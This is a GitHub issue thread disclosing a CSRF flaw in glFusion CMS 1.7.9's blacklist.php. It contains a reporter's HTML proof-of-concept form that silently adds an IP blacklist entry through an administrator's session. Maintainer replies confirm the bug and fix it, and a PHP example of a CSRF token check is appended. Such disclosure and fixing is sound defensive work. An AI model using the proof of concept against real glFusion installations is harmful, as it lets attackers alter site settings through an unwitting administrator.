glFusion / glfusion

glFusion CMS - Advanced Content Management with Style
https://www.glfusion.org
GNU General Public License v2.0

glFusion CMS 1.7.9 blacklist.php CSRF vulnerability #486

Closed Topsec-bunney closed 2 years ago

Topsec-bunney commented 2 years ago

Attackers can construct blacklist IP addresses. By using the CSRF vulnerability to trick the administrator into clicking, an attacker can add a blacklist entry.

poc

```html
<!-- Reporter's PoC: an attacker-hosted page that auto-submits a POST to the
     blacklist handler; the admin's browser attaches their session cookie. -->
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.255.130/glfusion-1.7.9/public_html/admin/plugins/bad_behavior2/blacklist.php" method="POST">
      <input type="hidden" name="mode" value="addsave" />
      <input type="hidden" name="bl&#95;type" value="spambot&#95;ip" />
      <input type="hidden" name="bl&#95;item" value="1&#46;1&#46;1&#46;121" />
      <input type="hidden" name="ban&#95;reason" value="ipbrute" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

(Screenshots attached: notepad++_aEpevZ9pjv, firefox_k6jJMk5luW)

leegarner commented 2 years ago

I can duplicate this; we should just need to add the CSRF token to the blacklist (and other) process. Thanks.

On Wed, Dec 8, 2021 at 11:11 PM Topsec_bunney @.***> wrote:

> Attackers can construct blacklist IP addresses. By using the CSRF vulnerability to trick the administrator into clicking, an attacker can add a blacklist entry.
>
> poc
>
> ![notepad++_aEpevZ9pjv](https://user-images.githubusercontent.com/73220685/145350064-36451a8c-3945-495d-a55e-8d9468733d60.png) ![firefox_k6jJMk5luW](https://user-images.githubusercontent.com/73220685/145350144-6391a423-9e50-41fc-9808-7a2c0456b33c.png)

mark0263 commented 2 years ago

Adding CSRF support for blacklist entry / edit.

mark0263 commented 2 years ago

Fixed with b380eada6647b2cccd94ab24aa744521b4d588af
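As an added example, not glFusion's own code and not the fix in the commit referenced above: a minimal PHP sketch of the per-session token check that leegarner's and mark0263's comments describe, applied to a handler shaped like blacklist.php's `mode=addsave` path. The field name `csrf_token` and the function names are assumptions; glFusion has its own token helpers, which are not shown here.

```php
<?php
// Added example (not glFusion's code): a minimal CSRF token check for a
// form handler like blacklist.php. Field and function names are hypothetical.
session_start();

const CSRF_FIELD = 'csrf_token';   // hypothetical hidden-field name

// Issue a per-session token; generated once and reused until the session ends.
function csrf_token(): string
{
    if (empty($_SESSION[CSRF_FIELD])) {
        $_SESSION[CSRF_FIELD] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_FIELD];
}

// Hidden input the legitimate admin form must include. A cross-site form
// cannot read the victim's session token, so it cannot supply this value.
function csrf_hidden_input(): string
{
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

// Constant-time comparison of the submitted token with the session token.
function csrf_check(array $post): bool
{
    $expected = $_SESSION[CSRF_FIELD] ?? '';
    $given    = $post[CSRF_FIELD] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Handler sketch: reject state-changing requests without a valid token
// before any blacklist row is written.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['mode'] ?? '') === 'addsave') {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // ... existing validation and insert of bl_type / bl_item / ban_reason ...
}
```

Every state-changing mode in the same file (edit, delete) needs the same check, which is what "blacklist (and other) process" in the thread refers to.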